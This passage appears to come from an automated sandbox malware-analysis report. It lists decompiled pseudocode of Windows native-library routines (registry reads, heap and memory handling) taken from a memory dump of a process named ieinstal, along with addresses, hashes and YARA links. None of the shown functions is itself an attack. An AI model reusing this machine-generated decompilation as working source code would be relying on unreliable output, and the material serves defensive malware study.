						E1EDC52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E1EDD15B5(0x1edf8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                        0x1edd0eb7
                        0x1edd0eb9
                        0x1edd0ec0
                        0x1edd0ec2
                        0x1edd0ecd
                        0x1edd105b
                        0x1edd105b
                        0x1edd1061
                        0x1edd1066
                        0x1edd1066
                        0x1edd106b
                        0x1edd1073
                        0x1edd1073
                        0x1edd0ed3
                        0x1edd0ed6
                        0x1edd0edc
                        0x1edd0ee0
                        0x1edd0ee7
                        0x1edd0ef0
                        0x1edd0ef5
                        0x1edd0efa
                        0x1edd0efc
                        0x1edd0efd
                        0x1edd0f03
                        0x1edd0f04
                        0x1edd0f06
                        0x1edd0f07
                        0x1edd0f09
                        0x1edd0f0e
                        0x1edd0f14
                        0x1edd0f23
                        0x1edd0f2d
                        0x1edd0f34
                        0x1edd0f34
                        0x1edd0f14
                        0x1edd0f52
                        0x00000000
                        0x00000000
                        0x1edd0f58
                        0x1edd0f73
                        0x1edd0f74
                        0x1edd0f79
                        0x1edd0f7d
                        0x1edd0f80
                        0x1edd0f86
                        0x1edd0fab
                        0x1edd0fb5
                        0x1edd0fc6
                        0x1edd0fd1
                        0x1edd0fe3
                        0x1edd0fd3
                        0x1edd0fdc
                        0x1edd0fdc
                        0x1edd0feb
                        0x1edd1009
                        0x1edd1009
                        0x1edd1015
                        0x1edd1027
                        0x1edd1017
                        0x1edd1020
                        0x1edd1020
                        0x1edd102f
                        0x1edd103c
                        0x1edd103c
                        0x1edd1048
                        0x1edd1050
                        0x1edd1050
                        0x1edd1055
                        0x00000000
                        0x1edd1055
                        0x1edd0f88
                        0x1edd0f9e
                        0x1edd0fa2
                        0x1edd0fa9
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1edd0fa9
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: `
                        • API String ID: 0-2679148245
                        • Opcode ID: 6311d7331d3ad364ed9831bc3d0a0aaac2ca396abab0821589f3e2903a7df5cb
                        • Instruction ID: 0c15cb83336cc56d77d8844b39e4e9389adf6f9022dd1fee2bba87c2439b139a
                        • Opcode Fuzzy Hash: 6311d7331d3ad364ed9831bc3d0a0aaac2ca396abab0821589f3e2903a7df5cb
                        • Instruction Fuzzy Hash: 585168752083829BD310DE29D990B2BB7E6FFC4744F100A2CE996972D0D761E80ACB62
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED3F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                        Download Yara Rule
                        C-Code - Quality: 75%
                        			E1ED3F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E1ED24120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E1ED49830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E1ED49990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E1ED495D0();
							goto L11;
						} else {
							_t109 = L1ED24620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E1ED4F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E1ED495D0();
										L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                        0x1ed3f0d3
                        0x1ed3f0d9
                        0x1ed3f0e0
                        0x1ed3f0e7
                        0x1ed3f0f2
                        0x1ed3f0f4
                        0x1ed3f0f8
                        0x1ed3f100
                        0x1ed3f108
                        0x1ed3f10d
                        0x1ed3f115
                        0x1ed3f116
                        0x1ed3f11f
                        0x1ed3f123
                        0x1ed3f124
                        0x1ed3f12c
                        0x1ed3f130
                        0x1ed3f134
                        0x1ed3f13d
                        0x1ed3f144
                        0x1ed3f14b
                        0x1ed3f152
                        0x1ed7bab0
                        0x1ed7bab0
                        0x1ed3f158
                        0x1ed3f158
                        0x1ed3f15a
                        0x1ed3f160
                        0x1ed3f165
                        0x1ed3f166
                        0x1ed3f16f
                        0x1ed3f173
                        0x1ed7baa7
                        0x1ed7baa7
                        0x1ed7baab
                        0x00000000
                        0x1ed3f179
                        0x1ed3f18d
                        0x1ed3f191
                        0x1ed7baa2
                        0x00000000
                        0x1ed3f197
                        0x1ed3f19b
                        0x1ed3f1a2
                        0x1ed3f1a9
                        0x1ed3f1af
                        0x1ed3f1b2
                        0x1ed3f1b6
                        0x1ed3f1b9
                        0x1ed3f1c4
                        0x1ed3f1d8
                        0x1ed3f1df
                        0x1ed3f1e3
                        0x1ed3f1eb
                        0x1ed3f1ee
                        0x1ed3f1f4
                        0x1ed3f20f
                        0x1ed7bab7
                        0x1ed7babb
                        0x1ed7bacc
                        0x1ed7bad1
                        0x1ed3f215
                        0x1ed3f218
                        0x1ed3f226
                        0x1ed3f22b
                        0x00000000
                        0x1ed3f22b
                        0x1ed3f1f6
                        0x1ed3f1f6
                        0x1ed3f1f9
                        0x1ed3f1fb
                        0x1ed3f1fb
                        0x1ed3f1f4
                        0x1ed3f191
                        0x1ed3f173
                        0x1ed3f152
                        0x1ed3f203

                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: @
                        • API String ID: 0-2766056989
                        • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                        • Instruction ID: 118eff9e19b8b2d141d045d3e7e50a068843fe3eabe24010746b46a8385210bb
                        • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                        • Instruction Fuzzy Hash: 9551BE75500751AFC320CF29C840A6BBBF9FF48714F108A2EF99587690E7B4E944CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED83540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                        Download Yara Rule
                        C-Code - Quality: 75%
                        			E1ED83540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x1edfd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E1ED40BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E1ED83706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E1ED4FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E1ED83540;
						E1ED4FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E1ED5DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E1ED90C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E1ED497C0();
					}
					return E1ED4B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E1ED83971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E1ED83884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E1ED4FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E1ED49650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E1ED83787(_a4,  &_v352, _t80);
						}
					}
					L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E1ED495D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                        0x1ed83552
                        0x1ed8355a
                        0x1ed8355d
                        0x1ed83566
                        0x1ed83567
                        0x1ed8357e
                        0x1ed8358f
                        0x1ed835a1
                        0x1ed835a5
                        0x1ed8366b
                        0x1ed8366b
                        0x1ed8366d
                        0x1ed83672
                        0x1ed83679
                        0x1ed83685
                        0x1ed8368d
                        0x1ed8369d
                        0x1ed836a7
                        0x1ed836b8
                        0x1ed836c6
                        0x1ed836c7
                        0x1ed836dc
                        0x1ed836e1
                        0x1ed836e7
                        0x1ed836e9
                        0x1ed836e9
                        0x1ed83703
                        0x1ed83703
                        0x1ed835b5
                        0x1ed835c0
                        0x1ed835c4
                        0x00000000
                        0x00000000
                        0x1ed835ca
                        0x1ed835d7
                        0x1ed835e2
                        0x1ed835e6
                        0x1ed835e8
                        0x1ed835f5
                        0x1ed835fa
                        0x1ed83603
                        0x1ed83604
                        0x1ed83609
                        0x1ed8360a
                        0x1ed83612
                        0x1ed83613
                        0x1ed8361e
                        0x1ed83622
                        0x1ed83628
                        0x1ed8362f
                        0x1ed8362f
                        0x1ed83636
                        0x1ed83638
                        0x1ed8363b
                        0x1ed83642
                        0x1ed83642
                        0x1ed83636
                        0x1ed83657
                        0x1ed83657
                        0x1ed8365c
                        0x1ed83662
                        0x1ed83669
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: BinaryHash
                        • API String ID: 0-2202222882
                        • Opcode ID: 63f6998f41cd2d67149cc2cec929cbfbc73f08566a201b6961fb1aa02fa709e9
                        • Instruction ID: 4fb396d8998933de0e420b1ed5680a67dc1455373cce104a1d03ea611f3eb9a1
                        • Opcode Fuzzy Hash: 63f6998f41cd2d67149cc2cec929cbfbc73f08566a201b6961fb1aa02fa709e9
                        • Instruction Fuzzy Hash: 274154B5D0056D9BDB21CA54CC81F9EB77CAF44714F1046A5EA09AB290DB30AE888FA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1EDD05AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                        Download Yara Rule
                        C-Code - Quality: 71%
                        			E1EDD05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E1EDD07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E1ED49730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E1EDCA80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E1EDCA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E1EDD1293(_t79, _v40, E1EDD07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E1ED27D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E1EDC138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                        0x1edd05c5
                        0x1edd05ca
                        0x1edd05d3
                        0x1edd06db
                        0x1edd06db
                        0x1edd06dd
                        0x1edd06e3
                        0x1edd06e3
                        0x1edd05dd
                        0x1edd05e7
                        0x1edd05f6
                        0x1edd0600
                        0x1edd0607
                        0x1edd0610
                        0x1edd0615
                        0x1edd061a
                        0x1edd061c
                        0x1edd061e
                        0x1edd0624
                        0x1edd0625
                        0x1edd0627
                        0x1edd0628
                        0x1edd0631
                        0x1edd0640
                        0x1edd064d
                        0x1edd0654
                        0x1edd0654
                        0x1edd0631
                        0x1edd066d
                        0x1edd0674
                        0x00000000
                        0x00000000
                        0x1edd0692
                        0x1edd069e
                        0x1edd06b0
                        0x1edd06a0
                        0x1edd06a9
                        0x1edd06a9
                        0x1edd06b8
                        0x1edd06d6
                        0x1edd06d6
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: `
                        • API String ID: 0-2679148245
                        • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                        • Instruction ID: 82bdabf2eaa86c45358eeaeebcd9af3345f56ee3ff86f6b3e231cb7911af4d4b
                        • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                        • Instruction Fuzzy Hash: C531AF32604345ABE710CE25CD85F9A7BDABBC47A4F044729B959DB6C0E770E908CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED83884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                        Download Yara Rule
                        C-Code - Quality: 72%
                        			E1ED83884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E1ED49650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L1ED24620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E1ED49650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                        0x1ed83893
                        0x1ed83896
                        0x1ed83899
                        0x1ed8389f
                        0x1ed838a0
                        0x1ed838a4
                        0x1ed838a9
                        0x1ed838ac
                        0x1ed838ad
                        0x1ed838ae
                        0x1ed838af
                        0x1ed838b1
                        0x1ed838b4
                        0x1ed838bb
                        0x1ed838bc
                        0x1ed838bd
                        0x1ed838c4
                        0x1ed838c8
                        0x1ed838ca
                        0x1ed838ca
                        0x1ed838d5
                        0x1ed8393e
                        0x1ed83940
                        0x1ed83942
                        0x1ed83952
                        0x1ed83954
                        0x1ed83961
                        0x1ed83961
                        0x1ed83967
                        0x1ed8396e
                        0x1ed8396e
                        0x1ed83947
                        0x1ed8394c
                        0x00000000
                        0x1ed8394c
                        0x1ed838ea
                        0x1ed838ee
                        0x1ed838f8
                        0x1ed838f9
                        0x1ed838ff
                        0x1ed83900
                        0x1ed83902
                        0x1ed83903
                        0x1ed8390b
                        0x1ed8390f
                        0x1ed83950
                        0x00000000
                        0x1ed83950
                        0x1ed83915
                        0x1ed8391d
                        0x1ed8391d
                        0x1ed83922
                        0x1ed83926
                        0x00000000
                        0x1ed83928
                        0x1ed8392b
                        0x1ed8392b
                        0x1ed83935
                        0x1ed83937
                        0x1ed83937
                        0x00000000
                        0x1ed83935
                        0x1ed83926
                        0x1ed838f0
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: BinaryName
                        • API String ID: 0-215506332
                        • Opcode ID: ab0a1bb06adf233dd11d102b9d4b38d1950d05579f349645a0d7a8d28fcdbf8b
                        • Instruction ID: 14831431ca0d9e60dac4198af9f16a2fd6d8028e023e83c1e95a4a57857c89fe
                        • Opcode Fuzzy Hash: ab0a1bb06adf233dd11d102b9d4b38d1950d05579f349645a0d7a8d28fcdbf8b
                        • Instruction Fuzzy Hash: 26312536D0061ABFDB15DB59C941E6FB775EF80B20F014369E858A72A0DB30DE00CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED3D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                        Download Yara Rule
                        C-Code - Quality: 33%
                        			E1ED3D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x1edfd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E1ED24120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E1ED4B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E1ED498D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E1ED495D0();
					L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                        0x1ed3d29c
                        0x1ed3d2a6
                        0x1ed3d2b1
                        0x1ed3d2b5
                        0x1ed3d2b6
                        0x1ed3d2bc
                        0x1ed3d2bd
                        0x1ed3d2be
                        0x1ed3d2bf
                        0x1ed3d2c2
                        0x1ed3d2c4
                        0x1ed3d2cc
                        0x1ed3d384
                        0x1ed3d34b
                        0x1ed3d34f
                        0x1ed3d350
                        0x1ed3d351
                        0x1ed3d35c
                        0x1ed3d35c
                        0x1ed3d2d6
                        0x1ed3d2da
                        0x1ed3d2e1
                        0x1ed3d361
                        0x1ed3d369
                        0x1ed3d36d
                        0x1ed3d2e3
                        0x1ed3d2e3
                        0x1ed3d2e3
                        0x1ed3d2e5
                        0x1ed3d2ed
                        0x1ed3d2f5
                        0x1ed3d2fa
                        0x1ed3d302
                        0x1ed3d303
                        0x1ed3d30b
                        0x1ed3d30f
                        0x1ed3d313
                        0x1ed3d318
                        0x1ed3d31c
                        0x1ed3d320
                        0x1ed3d379
                        0x1ed3d37d
                        0x00000000
                        0x00000000
                        0x1ed7affe
                        0x1ed7b001
                        0x1ed7b011
                        0x00000000
                        0x1ed3d322
                        0x1ed3d322
                        0x1ed3d330
                        0x1ed3d337
                        0x1ed3d35d
                        0x1ed3d339
                        0x1ed3d33f
                        0x1ed3d38c
                        0x1ed3d38c
                        0x1ed3d33f
                        0x1ed3d349
                        0x00000000
                        0x1ed3d349

                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: @
                        • API String ID: 0-2766056989
                        • Opcode ID: 9da7e28c232b93acb9fef7ac5e25949e802207d3c3bca97c9e12c1f0d9b59ab3
                        • Instruction ID: aa3ea0782ab6580bb4865643bc6c84cc7766975ceaf0ff9823da39ad02911a7e
                        • Opcode Fuzzy Hash: 9da7e28c232b93acb9fef7ac5e25949e802207d3c3bca97c9e12c1f0d9b59ab3
                        • Instruction Fuzzy Hash: DD317CB55083859FC311CF29C980A5BFBE9EB95654F600B2EF99493250D734DD09CFA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED11B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                        Download Yara Rule
                        C-Code - Quality: 72%
                        			E1ED11B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E1ED4BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E1ED4A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E1ED4A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L1ED24620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                        0x1ed11b8f
                        0x1ed11b9a
                        0x1ed11b9c
                        0x1ed11b9e
                        0x1ed11ba3
                        0x1ed67010
                        0x1ed67010
                        0x00000000
                        0x1ed11ba9
                        0x1ed11ba9
                        0x1ed11bae
                        0x00000000
                        0x1ed11bc5
                        0x1ed11bca
                        0x1ed11bcf
                        0x1ed11bd0
                        0x1ed11bd1
                        0x1ed11bd2
                        0x1ed11bd6
                        0x1ed11bdc
                        0x1ed11be0
                        0x1ed66ffc
                        0x1ed67000
                        0x00000000
                        0x1ed67006
                        0x1ed67009
                        0x1ed67009
                        0x1ed11be6
                        0x1ed11bec
                        0x1ed11c0b
                        0x1ed11c0b
                        0x1ed11c0c
                        0x1ed11c11
                        0x1ed11c12
                        0x1ed11c15
